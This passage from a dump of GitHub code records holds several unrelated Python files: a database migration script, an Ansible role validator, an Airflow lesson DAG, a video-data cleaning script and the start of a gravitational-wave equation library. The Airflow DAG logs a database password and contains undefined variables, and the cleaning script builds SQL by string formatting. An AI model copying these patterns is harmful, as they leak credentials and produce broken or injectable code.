parse_radl_json(dic['radl'])\n if 'extra_info' in dic and dic['extra_info'] and \"TOSCA\" in dic['extra_info']:\n dic['extra_info']['TOSCA'] = Tosca.deserialize(dic['extra_info']['TOSCA'])\n newinf.__dict__.update(dic)\n newinf.cloud_connector = None\n # Set the ConfManager object and the lock to the data loaded\n newinf.cm = None\n newinf.conf_threads = []\n for vm_data in vm_list:\n vm = DB150to151.deserialize_vm(vm_data)\n vm.inf = newinf\n if vm.im_id == vm_master_id:\n newinf.vm_master = vm\n newinf.vm_list.append(vm)\n return newinf\n\n @staticmethod\n def get_data_from_db(db_url):\n db = DataBase(db_url)\n if db.connect():\n inf_list = {}\n res = db.select(\"select * from inf_list where deleted = 0 order by id desc\")\n if len(res) > 0:\n for elem in res:\n try:\n inf = DB150to151.deserialize_info(elem[3])\n inf_list[inf.id] = inf\n except:\n sys.stderr.write(\"ERROR reading infrastructure from database, ignoring it!.\")\n else:\n sys.stderr.write(\"No data in database!.\")\n\n db.close()\n return inf_list\n else:\n sys.stderr.write(\"ERROR connecting with the database!.\")\n sys.exit(-1)\n\n @staticmethod\n def rename_old_data():\n db = DataBase(Config.DATA_DB)\n if db.connect():\n if db.table_exists(\"inf_list\"):\n now = str(int(time.time() * 100))\n if db.db_type == DataBase.SQLITE:\n db.execute('ALTER TABLE inf_list RENAME TO inf_list_%s;' % now)\n db.close()\n elif db.db_type == DataBase.MYSQL:\n db.execute('RENAME TABLE inf_list TO inf_list_%s;' % now)\n db.close()\n else:\n db.close()\n sys.stderr.write(\"ERROR connecting with the database!.\")\n sys.exit(-1)\n else:\n db.close()\n else:\n sys.stderr.write(\"ERROR connecting with the database!.\")\n sys.exit(-1)\n\n\nif __name__ == \"__main__\":\n if not Config.DATA_DB:\n sys.stderr.write(\"No DATA_DB defined in the im.cfg file!!\")\n sys.exit(-1)\n\n sys.stdout.write(\"Reading data from DB: %s.\\n\" % Config.DATA_DB)\n sys.stdout.write(\"Previous table inf_list will be renamed to inf_list_XXXXXX.\\n\")\n\n import IM.InfrastructureList\n inf_list = DB150to151.get_data_from_db(Config.DATA_DB)\n DB150to151.rename_old_data()\n # To create the new table\n sys.stdout.write(\"Saving data.\\n\")\n IM.InfrastructureList.InfrastructureList.init_table()\n IM.InfrastructureList.InfrastructureList.infrastructure_list = inf_list\n for inf_id in IM.InfrastructureList.InfrastructureList.infrastructure_list.keys():\n IM.InfrastructureList.InfrastructureList.save_data(inf_id)\n","repo_name":"grycap/im","sub_path":"scripts/db_1_5_0_to_1_5_1.py","file_name":"db_1_5_0_to_1_5_1.py","file_ext":"py","file_size_in_byte":4533,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"77"} +{"seq_id":"13202519394","text":"# Copyright 2022 NEC Corporation\r\n#\r\n# Licensed under the Apache License, Version 2.0 (the \"License\");\r\n# you may not use this file except in compliance with the License.\r\n# You may obtain a copy of the License at\r\n#\r\n# http://www.apache.org/licenses/LICENSE-2.0\r\n#\r\n# Unless required by applicable law or agreed to in writing, software\r\n# distributed under the License is distributed on an \"AS IS\" BASIS,\r\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n# See the License for the specific language governing permissions and\r\n# limitations under the License.\r\nimport os\r\nimport base64\r\nfrom flask import g\r\nfrom common_libs.ansible_driver.functions.commn_vars_used_list_update import CommnVarsUsedListUpdate, CommnVarsUsedListDisuseSet\r\nfrom common_libs.ansible_driver.functions.util import get_AnsibleDriverTmpPath\r\nfrom common_libs.ansible_driver.classes.CheckAnsibleRoleFiles import VarStructAnalysisFileAccess\r\nfrom common_libs.ansible_driver.classes.VarStructAnalJsonConvClass import VarStructAnalJsonConv\r\n\r\n\r\ndef external_valid_menu_after(objDBCA, objtable, option):\r\n \"\"\"\r\n 登録前ホストネームバリデーション(登録/更新/廃止)\r\n ARGS:\r\n objdbca :DB接続クラスインスタンス\r\n objtabl :メニュー情報、カラム紐付、関連情報\r\n option :パラメータ、その他設定値\r\n \r\n RETRUN:\r\n retBoo :True/ False\r\n msg :エラーメッセージ\r\n option :受け取ったもの\r\n \"\"\"\r\n retBool = True\r\n retStrBody = \"\"\r\n zip_data = None\r\n zip_file_path = \"\"\r\n role_package_name = \"\"\r\n PkeyID = option['uuid']\r\n\r\n zipFileName = \"{}/20403_zip_format_role_package_file_{}.zip\"\r\n if option[\"cmd_type\"] == \"Register\":\r\n zip_data = option[\"entry_parameter\"][\"file\"][\"zip_format_role_package_file\"]\r\n role_package_name = option[\"entry_parameter\"][\"parameter\"][\"role_package_name\"]\r\n\r\n if option[\"cmd_type\"] == \"Update\":\r\n if option[\"entry_parameter\"][\"file\"][\"zip_format_role_package_file\"] != \\\r\n option[\"current_parameter\"][\"file\"][\"zip_format_role_package_file\"]:\r\n zip_data = option[\"entry_parameter\"][\"file\"][\"zip_format_role_package_file\"]\r\n\r\n # ロールパッケージの変更判定\r\n if zip_data:\r\n # zipファイルを生成\r\n zip_file_path = zipFileName.format(get_AnsibleDriverTmpPath(), os.getpid())\r\n fd = open(zip_file_path, \"wb\")\r\n fd.write(base64.b64decode(zip_data))\r\n fd.close()\r\n\r\n def_vars_list = {}\r\n def_varsval_list = {}\r\n def_array_vars_list = {}\r\n cpf_vars_list = {}\r\n tpf_vars_list = {}\r\n gbl_vars_list = {}\r\n ITA2User_var_list = {}\r\n User2ITA_var_list = {}\r\n save_vars_array = {}\r\n disuse_role_chk = True\r\n\r\n global_vars_master_list = {}\r\n template_master_list = {}\r\n objMTS = \"\"\r\n FileID = \"3\"\r\n obj = VarStructAnalysisFileAccess(objMTS,\r\n objDBCA,\r\n global_vars_master_list,\r\n template_master_list,\r\n '',\r\n False,\r\n False)\r\n JsonObj = VarStructAnalJsonConv()\r\n if option[\"cmd_type\"] == \"Register\" or option[\"cmd_type\"] == \"Update\" or option[\"cmd_type\"] == \"Restore\":\r\n # ロールパッケージzipが変更されているか判定\r\n if zip_data:\r\n retAry = obj.RolePackageAnalysis(zip_file_path,\r\n role_package_name,\r\n PkeyID,\r\n disuse_role_chk,\r\n def_vars_list,\r\n def_varsval_list,\r\n def_array_vars_list,\r\n True,\r\n cpf_vars_list,\r\n True,\r\n tpf_vars_list,\r\n gbl_vars_list,\r\n ITA2User_var_list,\r\n User2ITA_var_list,\r\n save_vars_array)\r\n retBool = retAry[0][0]\r\n # intErrorType = retAry[0][1]\r\n # aryErrMsgBody = retAry[0][2]\r\n retStrBody = retAry[0][3]\r\n def_vars_list = retAry[1]\r\n def_varsval_list = retAry[2]\r\n def_array_vars_list = retAry[3]\r\n cpf_vars_list = retAry[4]\r\n tpf_vars_list = retAry[5]\r\n gbl_vars_list = retAry[6]\r\n ITA2User_var_list = retAry[7]\r\n User2ITA_var_list = retAry[8]\r\n save_vars_array = retAry[9]\r\n Role_name_list = retAry[10]\r\n \r\n if retBool is False:\r\n return retBool, retStrBody, option\r\n\r\n if retBool is True:\r\n # 変数構造解析結果を退避\r\n JsonStr = JsonObj.VarStructAnalJsonDumps(def_vars_list,\r\n def_array_vars_list,\r\n tpf_vars_list,\r\n ITA2User_var_list,\r\n gbl_vars_list,\r\n Role_name_list)\r\n UpData = {}\r\n UpData[\"ROLE_PACKAGE_ID\"] = PkeyID\r\n UpData[\"VAR_STRUCT_ANAL_JSON_STRING\"] = JsonStr\r\n objDBCA.table_update(\"T_ANSR_MATL_COLL\", UpData, \"ROLE_PACKAGE_ID\", False)\r\n\r\n # 復活の場合はテンプレート管理で定義されている変数構造と一致していない変数があるかのチェックまで行う。\r\n if option[\"cmd_type\"] == \"Register\" or option[\"cmd_type\"] == \"Update\":\r\n if retBool is True:\r\n retAry = CommnVarsUsedListUpdate(objDBCA, option, PkeyID, FileID, save_vars_array)\r\n retBool = retAry[0]\r\n retStrBody = retAry[1]\r\n if retBool is False:\r\n return retBool, retStrBody, option\r\n\r\n if option[\"cmd_type\"] == \"Discard\" or option[\"cmd_type\"] == \"Restore\":\r\n \r\n # 廃止の場合、関連レコードを廃止\r\n # 復活の場合、関連レコードを復活\r\n retAry = CommnVarsUsedListDisuseSet(objDBCA, option, PkeyID, FileID)\r\n retBool = retAry[0]\r\n retStrBody = retAry[1]\r\n if retBool is False:\r\n return retBool, retStrBody, option\r\n\r\n table_name = \"T_COMN_PROC_LOADED_LIST\"\r\n data_list = {\"LOADED_FLG\": \"0\", \"ROW_ID\": \"204\"}\r\n primary_key_name = \"ROW_ID\"\r\n objDBCA.table_update(table_name, data_list, primary_key_name, False)\r\n\r\n return retBool, retStrBody, option\r\n","repo_name":"shiota-2021/it-automation2-test","sub_path":"ita_root/common_libs/validate/valid_20403.py","file_name":"valid_20403.py","file_ext":"py","file_size_in_byte":7139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29474603733","text":"'''\nlesson 4 pipelines\nSchedule\n'''\n\nfrom airflow import DAG\nfrom airflow.utils.dates import days_ago\nimport logging\n\nfrom airflow.operators.dummy_operator import DummyOperator\nfrom airflow.operators.bash import BashOperator\nfrom airflow.operators.python_operator import PythonOperator\nfrom datetime import datetime, timedelta\nfrom airflow.operators.python import ShortCircuitOperator\n\n#from airflow.hooks import PostgresHook\nfrom airflow.hooks.postgres_hook import PostgresHook # хук для работы с GP\nimport logging\nlogging.info(PostgresHook.get_connection('conn_greenplum').password)\n\nDEFAULT_ARGS = {\n 'owner': 'ds',\n 'email': ['sokolartemy@gmail.com'],\n 'email_on_failure': ['sokolartemy@gmail.com'],\n 'retries': 15,\n 'start_date': datetime(2022, 3, 1),\n 'end_date': datetime(2022, 3, 14),\n #'sla': timedelta(hours=2),\n 'execution_timeout': timedelta(seconds=300),\n\n}\n\nwith DAG (\"a-sokolov-6-lesson-4\",\n schedule_interval='@daily',\ndefault_args=DEFAULT_ARGS,\nmax_active_runs=3,\ndescription = 'ais-description',\ntags=['lesson4', 'ais']\n\n) as dag:\n dummy = DummyOperator(task_id=\"dummy\")\n dummy2 = DummyOperator(task_id=\"dummy2\")\n\n #ddate = datetime.now().weekday()\n #ddate = datetime.strptime(ds, \"%Y-%m-%d\").weekday()\n #ds = kwargs['execution_date']\n #ds = dag_run.logical_date\n #ds = {{ execution_date }}\n\n #ds - execution_date (if you work with Airflow versions prior to 2.2). Nowadays, we just call it logical_date or ds for short. This is one of the many parameters that you can reference inside your Airflow task.\n\n def week_day():\n ddate = ds.weekday()\n if 6 != ddate: # note, monday is 0, tuesday is 1... so sunday is 6\n logging.info(f'Its not a sunday {ddate} ')\n return True\n else:\n logging.info(f'Its a sunday {ddate} ')\n return False\n\n\n def article():\n ddate = ds.weekday()\n day_of_week = ddate + 1 # +1 т.к. в задаче (понедельник=1, вторник=2, ...)\n logging.info(f'for weekday {day_of_week} :')\n\n sql_query = f'select heading from articles where id = {day_of_week}'\n\n pg_hook = PostgresHook(postgres_conn_id='conn_greenplum') # инициализируем хук\n conn = pg_hook.get_conn() # берём из него соединение\n cursor = conn.cursor() # и именованный (необязательно) курсор\n if day_of_week != 7:\n cursor.execute(sql_query) # исполняем sql\n query_res = cursor.fetchall() # полный результат\n one_string = cursor.fetchone()[0] # если вернулось единственное значение\n logging.info(f'for weekday {day_of_week} :')\n logging.info(query_res[0])\n\n\n articles = PythonOperator(\n task_id = 'articles',\n python_callable = article,\n dag=dag\n )\n\n not_sunday = ShortCircuitOperator(\n task_id = 'not_sunday',\n python_callable = week_day,\n dag=dag\n )\n not_sunday.doc_md = 'Hi, these are task docs.'\n\n dummy >> [articles, not_sunday]\n not_sunday >> dummy2\n","repo_name":"skarfex/education.courses_data_engineer","sub_path":"karpov_airflow_fullrep/dags/a-sokolov-6/a-sokolov-6-lesson-4.py","file_name":"a-sokolov-6-lesson-4.py","file_ext":"py","file_size_in_byte":3216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"20665924284","text":"import os\n\nimport psycopg2\n\nfrom utils import get_length, convert_and_crop_audio, split, make_json\nfrom settings import SQLALCHEMY_DATABASE_URI, CUSTOM_STATIC_PATH\n\n\ndef clean_parts():\n for root, dir, files in os.walk(CUSTOM_STATIC_PATH):\n for filename in files:\n if \".part\" in filename:\n os.remove(os.path.join(root, filename))\n\n\ndef set_length():\n connection = psycopg2.connect(SQLALCHEMY_DATABASE_URI)\n cursor = connection.cursor()\n for root, dir, files in os.walk(CUSTOM_STATIC_PATH):\n file_keys = set()\n for filename in files:\n youtube_id = filename.split('.')[0]\n if youtube_id not in file_keys:\n length = get_length(os.path.join(root, filename))\n cursor.execute(\"UPDATE videos SET length = {length} WHERE youtube_id = '{youtube_id}' \".format(\n length=length, youtube_id=youtube_id))\n connection.commit()\n file_keys.add(youtube_id)\n\n\ndef delete_top_1000():\n filenames = [line.split()[0] for line in open(\"/home/olga/sorted_sizes.txt\").readlines()][:1000]\n connection = psycopg2.connect(SQLALCHEMY_DATABASE_URI)\n cursor = connection.cursor()\n for filename in filenames:\n path = os.path.join(CUSTOM_STATIC_PATH, filename[:3], filename)\n try:\n os.remove(path+\".mp4\")\n except:\n pass\n try:\n os.remove(path+\".m4a\")\n except:\n pass\n try:\n os.remove(path+\".webm\")\n except:\n pass\n cursor.execute(\"UPDATE videos SET status = '{status}', skip = TRUE WHERE youtube_id = '{youtube_id}' \".format(\n status=\"deleted\", youtube_id=filename))\n connection.commit()\n\n\ndef create_json_and_wav():\n connection = psycopg2.connect(SQLALCHEMY_DATABASE_URI)\n cursor = connection.cursor()\n for root, dir, files in os.walk(CUSTOM_STATIC_PATH):\n file_keys = set()\n for filename in files:\n youtube_id = filename.split('.')[0]\n if youtube_id not in file_keys:\n if os.path.exists(os.path.join(root, youtube_id+\".m4a\")):\n convert_and_crop_audio(os.path.join(root, youtube_id+\".m4a\"))\n elif os.path.exists(os.path.join(root, youtube_id+\".webm\")):\n convert_and_crop_audio(os.path.join(root, youtube_id+\".webm\"))\n else:\n continue\n if os.path.exists(os.path.join(root, youtube_id+\".mp4\")):\n make_json(os.path.join(root, youtube_id+\".mp4\"))\n else:\n continue\n cursor.execute(\"UPDATE videos SET status = '{status}' WHERE youtube_id = '{youtube_id}' \".format(\n status=\"ready\", youtube_id=youtube_id))\n connection.commit()\n file_keys.add(youtube_id)\n","repo_name":"Veleslavia/yavat","sub_path":"_data_cleaning.py","file_name":"_data_cleaning.py","file_ext":"py","file_size_in_byte":2910,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"27340866069","text":"import abc\nimport functools\n\nfrom copy import deepcopy\nfrom fractions import Fraction\n\nimport numpy as np\nfrom numpy import pi\n\nimport astropy.units as u\nfrom astropy.units.quantity import Quantity\nfrom astropy.constants import G, c\n\nfrom matplotlib import pyplot as plt\n\nfrom sympy import (\n Abs,\n Add,\n Eq,\n expand_power_base,\n I,\n lambdify,\n latex,\n Mul,\n Pow,\n powsimp,\n solve,\n Symbol,\n symbols,\n sympify,\n)\nfrom sympy.core.function import _coeff_isneg\n\nfrom . import converters\nfrom .definitions import ALLOWED_VARIABLES, EQN_DEFINITIONS, SUPPLEMENTAL_EQUATIONS\n\ntry:\n from ._version import version as __version__\nexcept ModuleNotFoundError:\n __version__ = \"\"\n\n\n#: dictionary of constants\nCONSTANTS = {\"G\": G, \"c\": c, \"pi\": pi}\n\n\ndef function_call_signature(func):\n \"\"\"\n Decorator function to record the call signature of a function. This is\n based on https://www.geeksforgeeks.org/python-get-function-signature/.\n \"\"\"\n\n # get argument variable names\n argnames = func.__code__.co_varnames[: func.__code__.co_argcount]\n\n # get called function name\n fname = func.__name__\n\n @functools.wraps(func)\n def wrapper(*args, **kwargs):\n # generate string with function call signature\n funccall = fname + \"(\"\n for item in list(zip(argnames, args[: len(argnames)])) + list(kwargs.items()):\n funccall += f\"{item[0]}=\"\n funccall += f'\"{item[1]}\"' if isinstance(item[1], str) else f\"{item[1]}\"\n funccall += \", \"\n funccall = funccall.strip().rstrip(\",\") + \")\"\n\n # pass signature to function (which should capture it in some way)\n kwargs[\"function_call\"] = funccall\n res = func(*args, **kwargs)\n kwargs.pop(\"function_call\")\n return res\n\n return wrapper\n\n\ndef constfunc(name):\n return CONSTANTS[name]\n\n\n@function_call_signature\ndef equations(equation, **kwargs):\n \"\"\"\n This function generates a :class:`~cweqgen.equations.EquationBase` class\n holding a requested equation. This should always be used to generate an\n equation rather than using the :class:`~cweqgen.equations.EquationBase`\n class itself.\n \"\"\"\n\n if equation.lower() not in list(EQN_DEFINITIONS.keys()) + list(\n SUPPLEMENTAL_EQUATIONS.keys()\n ):\n raise KeyError(f\"Equation '{equation}' is not currently defined\")\n\n # set values for required equation\n eqinfo = (\n EQN_DEFINITIONS[equation.lower()]\n if equation.lower() in EQN_DEFINITIONS\n else SUPPLEMENTAL_EQUATIONS[equation.lower()]\n )\n kwargs[\"equation\"] = equation.lower()\n kwargs[\"equation_variable\"] = eqinfo[\"variable\"]\n kwargs[\"default_fiducial_values\"] = eqinfo[\"default_fiducial_values\"]\n kwargs[\"alternative_variables\"] = eqinfo.get(\"alternative_variables\", [])\n kwargs[\"converters\"] = eqinfo.get(\"converters\", {})\n\n # reference information\n try:\n kwargs[\"reference_string\"] = eqinfo[\"reference\"].get(\"short\", None)\n kwargs[\"reference_eqno\"] = eqinfo[\"reference\"].get(\"eqno\", None)\n kwargs[\"reference_adsurl\"] = eqinfo[\"reference\"].get(\"adsurl\", None)\n kwargs[\"reference_bibtex\"] = eqinfo[\"reference\"].get(\"bibtex\", None)\n except KeyError:\n # no references given\n pass\n\n kwargs[\"latex_string\"] = eqinfo[\"latex_string\"]\n kwargs[\"description\"] = eqinfo[\"description\"]\n\n kwargs[\"rhs_latex_strings\"] = {}\n for key in kwargs[\"default_fiducial_values\"]:\n kwargs[\"rhs_latex_strings\"][key] = (\n ALLOWED_VARIABLES[key][\"latex_string\"] if key in ALLOWED_VARIABLES else key\n )\n\n # check whether generating an equation from parts of from a chain\n parts = eqinfo.get(\"parts\", None)\n\n # generate equation\n if parts is not None:\n if isinstance(parts, dict):\n # convert dictionary into list of tuples\n parts = [(k, v) for k, v in parts.items()]\n kwargs[\"parts\"] = parts\n else:\n chain = eqinfo[\"chain\"]\n\n # get start equation, given by the first item in chain\n try:\n eq = equations(chain[0])\n except Exception as e:\n raise RuntimeError(f\"Could not generate first equation in a chain: {e}\")\n\n eqother = None\n for link in chain[1:]:\n # split into parts\n linkparts = link.split()\n\n if len(linkparts) != 2:\n raise ValueError(\"chain components must contain 2 values\")\n\n if \"equals\" == linkparts[0].strip().lower():\n # an equality\n eqother = equations(linkparts[1].strip())\n elif \"rearrange\" == linkparts[0].strip().lower():\n # rearrange\n varname = linkparts[1].strip().lower()\n\n if eqother is not None:\n eq = eq.rearrange(varname, equal=eqother)\n eqother = None\n else:\n eq = eq.rearrange(varname)\n elif \"substitute\" == linkparts[0].strip().lower():\n # substitute\n subeqname = linkparts[1].strip().lower()\n subeq = equations(subeqname)\n\n eq = subeq.substitute(eq)\n\n kwargs[\"parts\"] = eq.parts\n\n eq = EquationBase(**kwargs)\n\n # update the equation docstring\n try:\n # construct doctring\n eq.__doc__ = f\"\"\"\n{eqinfo[\"description\"]}.\n\n:param str equation: \"{equation.lower()}\"\n\"\"\"\n for k, v in eqinfo[\"default_fiducial_values\"].items():\n eq.__doc__ += f\":keyword float or ~astropy.units.quantity.Quantity {k}: {ALLOWED_VARIABLES[k]['description']}. The default value is {v}.\"\n if \"aliases\" in ALLOWED_VARIABLES[k]:\n eq.__doc__ += (\n \" Alternative keyword names are: \"\n + \", \".join(\n f'\"**{alias}**\"'\n for alias in ALLOWED_VARIABLES[k][\"aliases\"]\n if alias != k\n )\n + \".\"\n )\n eq.__doc__ += \"\\n\"\n except KeyError:\n pass\n\n # return the equation class\n return eq\n\n\nclass EquationBase:\n __metaclass__ = abc.ABCMeta\n\n def __init__(self, **kwargs):\n \"\"\"\n Base class for holding equations.\n \"\"\"\n\n self.kwargs = deepcopy(kwargs) # store copy of initial kwargs\n\n self.equation_name = kwargs.pop(\"equation\")\n self.variable = kwargs.pop(\"equation_variable\")\n\n # a list of tuples containing parts of equation\n self.parts = kwargs.pop(\"parts\")\n\n # dictionary to hold default fiducial values\n self.default_fiducial_values = kwargs.pop(\"default_fiducial_values\")\n\n # list containing additional keyword values that can be used\n self.alternative_variables = kwargs.pop(\"alternative_variables\", [])\n\n # dictionary of functions to convert from additional values into\n # required values (keyed on the required values)\n self.converters = kwargs.pop(\"converters\", {})\n\n self.latex_name = kwargs.pop(\"latex_string\") # lhs of equation\n self.description = kwargs.pop(\"description\")\n\n # LaTeX strings for RHS of equation\n self.rhs_latex_strings = kwargs.pop(\"rhs_latex_strings\")\n\n self.values = self.parse_kwargs(**kwargs)\n\n # get simple format reference\n self.reference_string = kwargs.pop(\"reference_string\", None)\n\n # equation number in reference\n self.reference_eqno = kwargs.pop(\"reference_eqno\", None)\n\n # URL of reference in ADS\n self.reference_adsurl = kwargs.pop(\"reference_adsurl\", None)\n\n # BibTeX for reference (from ADS)\n self.reference_bibtex = kwargs.pop(\"reference_bibtex\", None)\n\n # get function call for equations function\n self.equations_call = kwargs.get(\"function_call\", None)\n\n # make sure Sympy version of equation is generated\n _ = self.sympy_var\n _ = self.constant\n\n def parse_kwargs(self, **kwargs):\n \"\"\"\n Get the required values for the specific equation.\n \"\"\"\n\n values = {}\n\n for key in (\n list(self.default_fiducial_values.keys()) + self.alternative_variables\n ):\n value = self.check_for_alias(key, **kwargs)\n if value is not None:\n values[key] = value\n\n # perform conversions if required\n for key in self.converters:\n if key not in values:\n try:\n if callable(self.converters[key]):\n values[key] = self.converters[key](**values)\n else:\n if self.converters[key] in converters.__dict__:\n values[key] = converters.__dict__[self.converters[key]](\n **values\n )\n else:\n raise ValueError(\n f\"Converter function {self.converters[key]} is not recognised\"\n )\n except ValueError:\n pass\n\n return values\n\n @staticmethod\n def check_for_alias(key, **kwargs):\n \"\"\"\n Check whether any alias of the key is given in the keyword arguments.\n \"\"\"\n\n # check aliases\n if key in ALLOWED_VARIABLES:\n aliases = ALLOWED_VARIABLES[key][\"aliases\"]\n else:\n aliases = [key]\n\n for alias in aliases:\n if alias in kwargs:\n value = kwargs[alias]\n\n # check value has compatible units\n if key in ALLOWED_VARIABLES:\n if not isinstance(value, Quantity):\n if ALLOWED_VARIABLES[key][\"units\"] is not None:\n value *= u.Unit(ALLOWED_VARIABLES[key][\"units\"])\n else:\n value = Quantity(value)\n elif (\n isinstance(value, Quantity)\n and ALLOWED_VARIABLES[key][\"units\"] is not None\n ):\n try:\n _ = value.to(ALLOWED_VARIABLES[key][\"units\"])\n except (u.UnitConversionError, ValueError) as e:\n raise IOError(\n f\"{ALLOWED_VARIABLES[key]['description']} units are not compatible:\\n{e}\"\n )\n\n # check value has correct sign\n if ALLOWED_VARIABLES[key][\"sign\"] is not None:\n varray = np.asarray(value.value)\n try:\n thresh = len(varray)\n except TypeError:\n thresh = None\n\n strrep = (\n \"np.array(\"\n + np.array2string(varray, separator=\", \", threshold=thresh)\n + \")\"\n )\n\n if not eval(\n \"np.all(\" + strrep + ALLOWED_VARIABLES[key][\"sign\"] + \")\"\n ):\n raise ValueError(\n f\"{ALLOWED_VARIABLES[key]['description']} does not have the correct sign\"\n )\n\n return value\n\n return None\n\n def calculate_fiducial(self, **kwargs):\n \"\"\"\n Calculate and return the product of the fiducial components of the\n equation (excluding the constants) in SI units.\n\n Keyword arguments can be passed using the keys of the\n :attr:`.EquationBase.default_fiducial_values` giving the values at\n which to perform the calculation. Otherwise the default values, or\n values set at initialisation are used. These can be 1d arrays. If\n the arrays have different lengths, or the \"mesh\" keyword argument\n is given and is True, then a mesh grid will be created over the\n space and the values returned on that mesh. If arrays of equal\n length are given, and the \"mesh\" keyword is not given, then values\n will be calculated assuming for each set of equivalently positioned\n values in the array.\n \"\"\"\n\n # fiducialunits = 1.0\n funcargs = {}\n arglens = [] # store lengths of arguments\n\n self._unitdic = {}\n\n values = self.parse_kwargs(**kwargs)\n\n for key in self.var_names:\n if key in values:\n # use provided value\n val = values[key]\n else:\n val = self.default_fiducial_values[key]\n\n if not isinstance(val, Quantity):\n val = Quantity(val)\n\n funcargs[key] = (\n np.abs(val.si) if ALLOWED_VARIABLES[key][\"sign\"] == \">= 0\" else val.si\n )\n\n try:\n arglens.append(len(funcargs[key]))\n except TypeError:\n arglens.append(1)\n\n # check whether multiple values are arrays and create a mesh if\n # necessary\n usemesh = kwargs.get(\"mesh\", False)\n mesh = None\n if sum([length > 1 for length in arglens]) > 1:\n idx = np.argwhere(np.array(arglens) > 1).flatten()\n\n # create mesh is \"mesh\" is True or arguments have different lengths\n if usemesh or not np.all(\n (np.array([arglens[i] for i in idx]) - arglens[idx[0]]) == 0\n ):\n keys = [list(funcargs.keys())[i] for i in idx]\n\n mesh = np.meshgrid(*[funcargs[key] for key in keys])\n for i, key in enumerate(keys):\n funcargs[key] = mesh[i].flatten()\n\n # evaluate equation (loop through each part)\n fiducial = 1.0\n for key in funcargs:\n eveq = self._sympy_var_lambda[key](**{key: funcargs[key]})\n # NOTE: can't use *= as it causes a SegFault\n fiducial = fiducial * eveq\n\n if mesh is not None:\n fiducial = np.reshape(fiducial, mesh[0].shape)\n\n if isinstance(fiducial, Quantity):\n return fiducial.si.decompose()\n else:\n return fiducial\n\n def equation(self, displaytype=\"string\", nocomment=False, **latexkwargs):\n \"\"\"\n Generate the LaTeX string for the equation.\n\n Parameters\n ----------\n displaytype: str\n By default this will return a string containing the LaTeX equation\n text (without bounding \"$\" symbols). If using a Jupyter Notebook\n this will show as a formatted LaTeX equation. Alternatively, set to\n \"matplotlib\" to have the output returned as a Matplotlib figure\n object containing the equation.\n nocomment: bool\n By default the output LaTeX string will contain a comment line\n giving the cweqgen version and call signature from the equations\n function. To turn this off, set this argument to True.\n latexkwargs: dict\n Keyword parameters that can be passed to the\n :func:`sympy.printing.latex.latex` function. By default the\n ``fold_frac_powers`` option is set to True, the ``root_notation``\n option is set to False and the LaTeX symbol names are defined by\n the equation definition values.\n \"\"\"\n\n # use powsimp to put values with common exponents together\n seq_const = powsimp(self.sympy_const, force=True)\n seq_var = powsimp(self.sympy_var, force=True)\n\n # set defaults\n symrep = {symbols(key): val for key, val in self.rhs_latex_strings.items()}\n symrep[symbols(self.variable)] = self.latex_name\n\n latexkwargs.setdefault(\"root_notation\", True)\n latexkwargs.setdefault(\"fold_frac_powers\", True)\n latexkwargs.setdefault(\"long_frac_ratio\", 2.0)\n\n mode = latexkwargs.pop(\"mode\", \"plain\")\n delim = \"$\" if displaytype == \"matplotlib\" or mode == \"inline\" else \"\"\n\n if abs(seq_const) != 1:\n latex_equation_const = latex(seq_const, **latexkwargs)\n else:\n latex_equation_const = (\n \"\"\n if seq_const == 1 or ALLOWED_VARIABLES[self.variable][\"sign\"] == \">= 0\"\n else \"-\"\n )\n\n latexkwargs[\"root_notation\"] = False\n latexkwargs.setdefault(\"symbol_names\", symrep)\n latex_equation_var = latex(seq_var, **latexkwargs)\n\n latex_equation = f\"{delim}{self.latex_name} = {latex_equation_const}{latex_equation_var}{delim}\"\n\n if displaytype.lower() == \"matplotlib\":\n return EquationLaTeXToImage(latex_equation)\n else:\n # add LaTeX comment to string with cweqgen version and equations call\n comment = None\n if not nocomment:\n comment = f\"equation generated with cweqgen v{__version__}\"\n if self.equations_call is not None:\n comment += f\":\\n {self.equations_call}\"\n\n return EquationLaTeXString(latex_equation, comment=comment)\n\n @property\n def eqn(self):\n \"\"\"\n The equation as a string.\n \"\"\"\n\n return self.equation()\n\n def __str__(self):\n return str(self.equation())\n\n def __repr__(self):\n return str(self.equation())\n\n def _repr_latex_(self):\n return \"$\" + str(self.equation()) + \"$\"\n\n def fiducial_equation(\n self, dp=2, brackets=\"()\", displaytype=\"string\", nocomment=False, **kwargs\n ):\n \"\"\"\n Generate the LaTeX string for the equation inserting in fiducial values.\n\n Parameters\n ----------\n dp: int\n The number of decimal places to use for non-integer fiducial values.\n brackets: str\n The style of brackets to use, e.g., \"()\", \"{}\" or \"[]\". Defaults is\n round parentheses \"()\".\n displaytype: string\n By default this will return a string containing the LaTeX equation\n text (without bounding \"$\" symbols). If using a Jupyter Notebook\n this will show as a formatted LaTeX equation. Alternatively, set to\n \"matplotlib\" to have the output returned as a Matplotlib figure\n object containing the equation.\n nocomment: bool\n By default the output LaTeX string will contain a comment line\n giving the cweqgen version and call signature from the equations\n function. To turn this off, set this argument to True.\n \"\"\"\n\n latex_equation = self.latex_name + \" = \"\n\n # add in coefficient\n values = deepcopy(self.values)\n for key, val in kwargs.items():\n values[key] = val\n values = self.parse_kwargs(**values)\n\n coeff = self.evaluate(**values)\n\n if not isinstance(coeff, Quantity):\n # convert into Quantity\n coeff = Quantity(coeff)\n\n latex_equation += coeff.to_string(precision=(dp + 1), format=\"latex\").replace(\n \"$\", \"\"\n )\n\n if brackets not in [\"()\", \"{}\", \"[]\", None]:\n raise ValueError(f\"Bracket type {brackets} is not recognised\")\n\n lbrace = r\"\\left\" + brackets[0] if brackets is not None else \"\"\n rbrace = r\"\\right\" + brackets[1] if brackets is not None else \"\"\n\n fiducial = \"\"\n\n for key in self.var_names:\n arg = self._sympy_var_parts[key]\n varlatex = (\n self.rhs_latex_strings[key]\n if not isinstance(arg, Pow)\n else latex(\n arg.base, symbol_names={symbols(key): self.rhs_latex_strings[key]}\n )\n )\n\n # get exponent\n exp = 1 if not isinstance(arg, Pow) else Fraction(*arg.exp.as_numer_denom())\n\n # get value\n if key in values:\n # use provided value\n val = Quantity(values[key])\n else:\n val = Quantity(self.default_fiducial_values[key])\n\n if exp != 1:\n # evaluate base for cases such as args being (n + 1)^x\n val = 